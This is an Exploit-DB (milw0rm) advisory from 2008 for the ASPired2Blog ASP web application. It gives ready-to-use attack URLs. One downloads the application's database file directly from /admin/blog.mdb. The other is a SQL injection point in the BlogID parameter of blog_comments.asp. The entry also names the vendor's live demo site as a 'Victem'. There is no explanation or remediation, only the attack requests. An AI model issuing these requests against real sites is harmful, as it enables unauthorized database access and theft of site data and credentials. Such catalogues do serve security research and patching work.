the net guys aspired2blog - SQL Injection / File Disclosure

EDB-ID:

7436




Platform:

ASP

Date:

2008-12-12


#########################################################
---------------------------------------------------------
Portal Name: ASPIred2Blog
Vendor : http://thenetguys.us/Home/Blog.asp
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/admin/blog.mdb
 
[SQL]:
http://site.com/[Path]/admin/blog_comments.asp?BlogID='[SQL]
 
---------------------------------
Victem :
http://thenetguys.us/ASPired2/Blog/index.asp

# milw0rm.com [2008-12-12]